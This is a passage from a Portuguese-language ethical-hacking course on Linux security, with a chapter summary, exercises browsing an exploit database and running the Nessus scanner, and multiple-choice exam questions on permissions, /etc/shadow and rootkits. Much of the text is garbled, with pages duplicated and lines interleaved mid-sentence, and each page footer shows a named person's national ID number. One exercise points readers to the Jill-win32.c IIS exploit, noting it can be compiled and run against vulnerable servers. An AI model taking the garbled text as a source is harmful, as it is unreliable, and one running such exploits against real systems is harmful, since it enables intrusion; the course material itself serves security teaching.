autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

Resumo

Neste capítulo, você aprendeu sobre o Linux e como ele é um sistema operacional excelente para
testes de segurança. Você também aprendeu que o Linux é um potencial alvo de ataques e,
portanto, também deve ser corrigido e endurecido.

Você também aprendeu a realizar tarefas básicas em um sistema Linux, como adicionar usuários
e senhas de atualização. A importância da segurança da senha foi discutido, e lhe foi dada a
oportunidade de ver a importância de senhas fortes. Você viu que o Linux, semelhante a
Microsoft, exige uma defesa em profundidade para ser realmente seguro. Isso inclui a segurança
física, a segurança da senha, segurança lógica e gerenciamento
gerenciamento de
d e patches
patches para
p ara certificar-se de
que para baixo nível de software está protegido contra vulnerabilidades conhecidas.
Resumo
Em seguida, você aprendeu sobre várias ferramentas de avaliação
avaliação de segurança.
se gurança. As ferramentas
de avaliação de segurança automáticas são valiosas, uma vez que pode testar um grande número
de problemas com rapidez. Estes programas podem ser encontrados como código aberto e
Neste capítulo, você aprendeu sobre o Linux e como ele é um sistema operacional excelente para
aplicações comerciais. Eles são uma ferramenta poderosa nas mãos de hackers éticos e do
testes de segurança. Você também aprendeu que o Linux é um potencial alvo de ataques e,
atacante. Finalmente uma categoria interessante de instrumentos de avaliação foram discutidos os
portanto, também deve ser corrigido e endurecido.
quadros de exploração que agora estão se tornando mais maduros. Estas ferramentas permitem ao
usuário encontrar
Você também uma vulnerabilidade
aprendeu e, básicas
a realizar tarefas em seguida, aponte
em um e clique
sistema para
Linux, explorar.
como Ferramentas
adicionar usuários
como o Core Impact, Metasploit, e do Framework Exploração são exemplos de instrumentos de
e senhas de atualização. A importância da segurança da senha foi discutido, e lhe foi dada a
avaliação automatizadas.
oportunidade de ver a importância de senhas fortes. Você viu que o Linux, semelhante a
Microsoft, exige uma defesa em profundidade para ser realmente seguro. Isso inclui a segurança
Capítulo 5
física, a segurança da senha, segurança lógica e gerenciamento d e patches p ara certificar-se de
que para baixo nível de software está protegido contra vulnerabilidades conhecidas.

Em seguida, você aprendeu sobre várias ferramentas de avaliação de se gurança. As ferramentas


de avaliação de segurança automáticas são valiosas, uma vez que pode testar um grande número 29
de problemas com rapidez. Estes programas podem ser encontrados como código aberto e
aplicações comerciais. Eles são uma ferramenta poderosa nas mãos de hackers éticos e do
atacante. Finalmente uma categoria interessante de instrumentos de avaliação foram discutidos os
quadros de exploração que agora estão se tornando mais maduros. Estas ferramentas permitem ao
usuário encontrar uma vulnerabilidade e, em seguida, aponte e clique para explorar. Ferramentas
como o Core Impact, Metasploit, e do Framework Exploração são exemplos de instrumentos de
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34

Aplique seu conhecimento.


conhecimento.

Você viu o quão úteis podem


podem ser as ferramentas de avaliação automatizadas e como o Linux é umauma boa
plataforma para a realização
realização de testes de segurança
segurança. Portanto, este aplicar o seu conhecimento
conhecimento terá que
examinar algumas ferramentas
ferramentas de avaliação
avaliação automatizada e um dos melhores
melhores bancos de dados de
exploração on-lin
-line.
e.

Exercícios
Aplique seu conhecimento.

5.1. Explorando o site [Link]


[Link]
[Link] é umauma Floresta editada colaborativamente
colaborativamente composta
composta por árvores, que qualquer
qualquer
Você viu o quão úteis
pessoa pode contribuir. pode m ser as ferramentas
contribuir. Estas árvores saem de de avaliação automatizadas
de uma forma ordenada e como o Linux
exploiétsuque
ordenada. As ferramentas e exploits ma boa
estão
plataforma para a realizaçã
disponíveis para cada passo o de testes de seguran ça.
passo de um teste de penetração Portanto, este aplicar
penetração e para as explorações o seu conheciment
explorações estão disponíveis o terá que
disponíveis para as
examinar algumas ferra mentas
redes, sistemas e aplicações.
aplicações. de avaliação automatizada e um dos melhor es bancos de dados de
exploração on-line.
Exercícios
Tempo estimado: 10 minutos.

1- Abra o seu navegador


navegador e acesse [Link]
[Link]
[Link]
[Link].
5.1. Explorando
2- Você vai notaroàsite [Link]
esquerd
esquerda a da tela que várias árvores
árvores estão listadas.
[Link] é uma Floresta editada colaborativamente composta por árvores, que qualquer
pessoa pode
3- Clique contribuir.
na interface daEstas
árvore
árvoreárvores
Exploitsaem de uma forma ordenada. As ferramentas e exploits que estão
online.
disponíveis para cada passo de um teste de penetração e para as explorações estão disponíveis para as
redes,
4- Estasistemas e aplicaç
página terá ões.
links para
pa ra aplicações, sistemas e redes. Clique no link aplicações.

5- Nestaestimado:
Tempo página, você
voc
10êminutos.
verá links para todas as aplicações
aplicações que foram
foram listados no banco de dados
dados. Encontre
o link para servidores
servidores web e clique no link para o aplicativo do IIS.
1- Abra o seu navegador e acesse [Link].
6- Sob o IIS, localize o código
código de exploração
exploração Jill-win32.c. Depois de encontrar
encontrar o código, você pode
pode vê-lo
2- Você vai
clicando nonotar
botãoàvista.
esquerd a da tela
Se você que várias
identificou um ár vores
servidorestão
servidor listadas. ao buffer overflow de impressora
IIS susceptíveis impressora
IPP, esta ferramenta
ferramenta pode ser compilada e executada para aproveitar aproveitar essa vulnerabilidade.
vulnerabilidade.
3- Clique na interface da árvore Exploit online.
7- Continue a explorar o SecurityForest site. Se você voltar para a página página principal, você vai ver que há
4- Esta página
também terá links
um banco para de
de dados aplicações, sistemas
ferramentas sob oelink
sob redes. Clique
árvore nomenta
ferra link aplicações.
ferramenta que lista todas as ferramentas
ferramentas
por categoria.
5- Nesta página, você verá links para todas as aplicações que foram listados no banco de dados. Encontre
8- Porpara
o link fim, clique
servidornoeslink
webExploitation
Exploitation
e clique noFramework
Fra mework
link para [Link]
O Ex
Exploitation
ploitation
do [Link] é semelhante ao bancobanco de
dados Metasploit, exceto
exceto que ele aproveita a enormeenorme quantidade
quantidade de façanhas na árvore de exploração.
exploração.
Um filme
6- Sob está
o IIS, disponí
disponível
localize o vel demonstra
código que aoferramenta
de exploraçã ferra menta em:
Jill-win32.c. Depois de encontrar o código, você pode vê-lo
[Link]
[Link] [Link]/wiki/[Link]/Exploi
[Link]/wiki
clicando no botão vista. /[Link]/Exploitation_Framework_Screen
/[Link]/Exploi
Se você identificou um servidor tation_Framework_Screenshots
tation_Framework_Screen
IIS susceptíveis ao buffershots
overflow de impressora
IPP, esta ferram
A ferramenta enta
par
para pode ser
a baseada emcompilada e executada
Web Browser
Browser para apro
para Windows
Windows veitar
pode ser essa vulnerab
baixada em: ilidade.

7- Continue a explorar o SecurityForest site. Se você voltar para a página principal, você vai ver que há
também um banco de dados de ferramentas sob o link árvore ferramenta que lista todas as ferramentas 30
por categoria.

8- Por fim, clique no link Exploitation Framework. O Exploitation Framework é semelhante ao banco de
dados Metasploit, exceto que ele aproveita a enorme quantidade de façanhas na árvore de exploração.
Um filme está disponível demonstra que a ferramenta em:
[Link]
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02

[Link]/wiki/[Link]
[Link]/wiki/[Link]/Exploitation_
om/wiki/[Link]/Exploitation_Framework_Download
p/Exploitation_Framework_Download..
Framework_Download

5.2 Executando o Servidor


Servidor Nessus
Neste exercício, você
você irá executar o servidor
servidor Nessus e olhar para algumas
algumas de suas configurações.
configurações.

Tempo estimado: 30 minutos.

1- Iniciar Knoppix STD. Os arquivos de instalação


instalação podem ser encontrados
encontrados no CD ou pode ser baixado
baixado a
partir de [Link]-std
[Link]
.org..
.org
[Link]/wiki/[Link]/Exploitation_Framework_Download.
2- Abra uma janela de terminal
terminal e certifique-
certifique-se que você está executando
executando como root. Se não, digite su
su..

3-
5.2Você precisa adicionar
Executando o Servidorum
uNessus
m usuário para o servidor
servidor Nessus. Isto pode
pode ser realizado, digitando Nessus-
adduser do prompt.
Neste exercício, você irá executar o servidor Nessus e olhar para algumas de suas configurações.

4- Depois
Tempo que um 30
estimado: usuári
usuárioo é adicionado, você vai querer começar o daemon
minutos. daemon do servidor Nessus,
digitando o seguinte: / etc / init.d início / nessusd.
1- Iniciar Knoppix STD. Os arquivos de instalação podem ser encontrados no CD ou pode ser baixado a
5- Umadevez
partir que o daemon
daemon é.org
[Link]-std iniciado,
. você pode digitar nessus na linha de comando para iniciar o cliente
Nessus. Você agora será
será solicitado a fazer login
login para Nessus. Digite o nome de usuário e senha que você
2- Abra
criou nouma janela
passo 3. de terminal e certifique-se que você está executando como root. Se não, digite su.

3-
6- Você
Cliqueprecisa
em OKadicionar
páginaude
na página m usuário para
aviso que o servidor
alerta Nessus.
sobre plugins
plug Isto pods.e Esta
ins perigoso ser realizado,
mensagem,
mensagem, digitando Nessus-
basicamente,
adduserque
afirma do alguns
prompt. plugins podem causar alguns servid
plugins servidores
ores para falhar ou travar.
travar. Se você fosse para
executar essa ferramenta
ferramenta em uma rede de produção,
produção, isto é algoalgo que você gostaria de discutir com com a
4- Depois que um
administração usuári
antes o é adicionado,
de tomar
de vocêsobre
uma decisão vai querer começar o daemon do servidor Nessus,
como proceder.
digitando o seguinte: / etc / init.d início / nessusd.
7- Navegue pelos parâmetros
parâmetros disponíveis em em cada guia. Estes incluem:
incluem: Plugins, Prefs, Opções
Opções de
escaneamento,
5- Uma vez que Seleção
Seleçã o Target,
o daemon e do usuário.
é iniciado,usuári o. digitar nessus na linha de comando para iniciar o cliente
você pode
Nessus. Você agora será solicitado a fazer login para Nessus. Digite o nome de usuário e senha que você
criou
8- Sobno [Link], digite
a guia digite o dispositivo de destino
destino que você gostaria
gostaria de escanear. Certifique-se
Certifique-se de que
este é um sistema que você tem permissão para executar uma varredura varredura. Iniciar a avaliação,
avaliação, clicando em
6- Clique
Iniciar em OK na página de aviso que alerta sobre plugins perigosos. Esta mensagem, basicamente,
o Scan.
afirma que alguns plugins podem causar alguns servidores para falhar ou travar. Se você fosse para
9- Na página
executar essade configuraç
configuração
ferra menta em ão de
umaatualizações obter arquivos,
rede de produção, arquivos,
isto é algselecione
o que vocêSim, fazer ode
gostaria download dos
discutir co ma
administração
arquivos antes
de instalação
instala deatualizados
ção tomar uma(recomendado)
decisão sobreo)como
(recomendad proceder.
e clique em Avançar.
Avançar. Você precisa se registrar
registrar para
obter atualizações. Atualizações
Atualizações são de sete dias atrásatrás para não-clientes pagantes.
7- Navegue pelos parâmetros disponíveis em cada guia. Estes incluem: Plugins, Prefs, Opções de
escaneamento,
10 Seleçãoesteja
10-- Após a verificação
verificação Target, e do usuári
concluída, [Link] os resultados. Esta informação
revise informação podepode ser adicionada ao seu
relatório de teste indicando
indicando ter sido um ensaio
ensaio real.
8- Sob a guia de rede, digite o dispositivo de destino que você gostaria de escanear. Certifique-se de que
este
11-
11 - Oépróximo
um sistema
passo
passoquedevocê
umatem permissão
avaliaçã
avaliação para executar
o real seria uma varreedura
patch, endurecer . Iniciar
atualizar siastemas
avaliaçãque
os sistemas o, clicando
foram em
Iniciar o [Link] serem vulneráveis.
encontrados

9- Na página de configuração de atualizações obter arquivos, selecione Sim, fazer o download dos
arquivos de instalação atualizados (recomendado) e clique em Avançar. Você precisa se registrar para
obter atualizações. Atualizações são de sete dias atrás para não-clientes pagantes. 31

10- Após a verificação esteja concluída, revise os resultados. Esta informação pode ser adicionada ao seu
relatório de teste indicando ter sido um ensaio real.

11- O próximo passo de uma avaliação real seria patch, endurecer e atualizar os sistemas que foram
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02

Questões de Preparação
Preparação ao Exame.

1. Como pode em uma lista de usuários Linux que


que processos estão funcionando, se
se ele suspeita que algo
tenha sido carregado
carregado que não for aprovado?
aprovado?

A. netstat

B. ls

C. echo
Questões de Preparação ao Exame.
D. os
1. Como pode em uma lista de usuários Linux que processos estão funcionando, se ele suspeita que algo
2-Você foi contratado por Bob Burgers para escanear sua rede em busca de vulnerabilidades. Ele
tenha sido carregado que não for aprovado?
gostaria que você executasse uma verificação em nível de sistema. Qual dos seguintes programas
netstat
você deve usar?
ls
A. Flawfinder
A.
echo
B. N-Stealth
B.
os
C. SARA
C.
D. Whisker
D.
3- Você foi capaz de obter uma janela de terminal aberto em um servidor Linux remoto. Agora Agora
você precisa usar uma linha de comando em um navegador para baixar uma ferramenta de
2-Você foi contratado por Bob Burgers para escanear sua rede em busca de vulnerabilidades. Ele
escalonamento de executasse
gostaria que você privilé[Link]
Qualverificação
dos seguintes vai funcionar?
em nível de sistema. Qual dos seguintes programas
você deve usar?
A. TFTP
A. Flawfinder
B. Lynx
B. N-Stealth
C. Explorer
C. SARA
D. Firefox
D. Whisker
4- Enquanto a mexia com o computador Linux de seu companheiro de quarto, você acessou seu
passwd. Aqui
3- Você foi está de
capaz o que você
obter umaencontrou.
janela de terminal aberto em um servidor Linux remoto. Agora
você precisa usar uma linha de comando em um navegador para baixar uma ferramenta de
root:x:0:0:root:/root:/bin/bash
escalonamento de privilégios. Qual dos seguintes vai funcionar?
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
A. TFTP
Onde está o root da senha?
B. Lynx
A. Nenhuma senha foi definida.
[Link]
C. A senha foi sombreada (Shadow).

D. Firefox 32
root:x:0:0:root:/root:/bin/bash
4- Enquanto a mexia com o computador Linux de seu companheiro de quarto, você acessou seu
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
passwd. Aqui está o que você encontrou.
Onde está o root da senha?
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02

C. A senha não é visível porque você não está logado como root.
D. A senha não é neste arquivo, é no SAM.

5- Qual dos seguintes permitirá que você defina o usuário para acesso completo, o grupo só
de leitura, e todos os outros não têm acesso?

A. chmod 777

B. chroot 777

C. chmod 740

D. chroot 740
C. A senha não é visível porque você não está logado como root.
6- Seu chefe
D. Ade equipe
senha nãolhe pediuarquivo,
é neste para fazer alterações
é no SAM. absolutas para permissões de um arquivo.
Qual dos seguintes seria correto?
5- Qual dos seguintes permitirá que você defina o usuário para acesso completo, o grupo só
[Link]
leitura,a+rwx
e todos os outros não têm acesso?

B. chmod
A. Chmod777
a+rwx

C. 320
B. chroot 777

D. Chmod740
C. chmod 320

7- Qual dos seguintes


D. chroot 740 não é um grupo de usuário válido no Linux?

6- A.
SeuSystem users
chefe de equipe lhe pediu para fazer alterações absolutas para permissões de um arquivo.
Qual dos seguintes seria correto?
B. Super users
A. chroot a+rwx
C. Guests
B. Chmod a+rwx
D. Normal users
C. chroot 320
8- Você foi explorar os arquivos e estrutura de diretório de servidor Linux novo. Quais são as
entradas do arquivo
D. Chmod 320 / etc hosts / no arquivo registrado?

A. Odos
7- Qual endereço IP, não
seguintes a máscara, e negar
é um grupo de ou permitir
usuário o comunicado.
válido no Linux?

A. B. O endereço
System users IP e o status de endereços aprovados ou negados.

B.C. O endereço
Super users IP, a máscara de sub-rede e ga
gateway
teway padrão.

C.D. O endereço IP, o nome da máquina, e nenhum nome alternativo.


Guests
9- No prompt do seu servidor
servidor Linux, você entra
entra cat / etc / passwd. Na linha
linha de saída seguinte,
seguinte, o que é a
D. Normal users
função do 100
100??
8- Você foi explorar os arquivos e estrutura de diretório de servidor Linux novo. Quais são as
A . A ID de usuário
entradas do arquivo / etc hosts / no arquivo registrado?

A. O endereço IP, a máscara, e negar ou permitir o comunicado. 33

B. O endereço IP e o status de endereços aprovados ou negados.

C. O endereço IP, a máscara de sub-rede e gateway padrão.


9- NoD.
prompt do seu ser
O endereço IP,vidor Linux,
o nome davocê entra cat
máquina, / etc / passwd.
e nenhum Na linha de saída seguinte, o que é a
nome alternativo.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02

B. O usuário 100 criado.


criado.

C. A identificação de grupo.
grupo.

D. Um valor binário.
binário.

10- Onde é que


10- que um atacante localiza o arquivo de senha
senha do sistema em uma máquina Linux, que é
restrita a raiz e contém
contém senhas criptografadas?
criptografadas?

A. /etc/hosts
B. O usuário 100 criado.
B. /etc/shadow
C. A identificação de grupo.
C. /etc/passwd
D.D.
Um/etc/[Link]
valor binário.

10- Onde é que um atacante localiza o arquivo de senha do sistema em uma máquina Linux, que é
11-- Nas versões mais modernas de uso
11 uso Linux qual dos seguintes padrões
padrões de senha de criptografia
criptografia por
restrita a raiz e contém senhas criptografadas?
default?
/etc/hosts

A. MD5
/etc/shadow

A. B. DES
/etc/passwd

B.
C. AES
/etc/[Link]

C. Diffie Hellman
D.
11
12---D.
12 Nas
Qualversões mais
tesmodernas
dos seguintes
seguin de us
é um rootkit o Linux
LKM
LKM?? qual dos seguintes padrões de senha de criptografia por
default?
A . Flea

B. T0rm
A. MD5
C. Adore
B. DES
D. Chkroot
C. AES
13- Como pode ajudar a evitar a Tripwire contra cavalos de Tróia e rootkits?
12-D.
Qual dos seguin
Diffie tes é um rootkit LKM?
Hellman
A. Ele ajuda você pegar alterações utilitários de sistema.

B. Ele endurece aplicações contra ataques.


A . Flea
C. Ele verifica código fonte da aplicação e encontra buffer overflows potenciais.
B. T0rm
D. Ele constrói uma prisão que só dá hackers acesso a algumas pastas pré-definidas.
C. Adore
14- Qual dos seguintes permitirá que você defina o usuário para acesso completo, o grupo de
D. Chkroot
34
13- Como pode ajudar a evitar a Tripwire contra cavalos de Tróia e rootkits?

A. Ele ajuda você pegar alterações utilitários de sistema.

B. Ele endurece aplicações contra ataques.


Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02

leitura e de escrita, e todos os outros para acesso de leitura?

A. chmod 746

B. chroot 644

C. chmod 764

D. chroot 746

15- Quais dos seguintes programas podem ser usados para construir uma prisão em torno de um
programa, como o FTP, para evitar que hackers tenham acesso a pastas e arquivos não
autorizados?
leitura e de escrita, e todos os outros para acesso de leitura?
A. Tripwire
A. chmod 746
B. Chmod
B. chroot 644
C. Loadable kernel modules
C. chmod 764
D. Chrooting
D. chroot 746

15- Quais dos seguintes programas podem ser usados para construir uma prisão em torno de um
programa, como o FTP, para evitar que hackers tenham acesso a pastas e arquivos não
autorizados?

A. Tripwire

B. Chmod

C. Loadable kernel modules

D. Chrooting

35

Você também pode gostar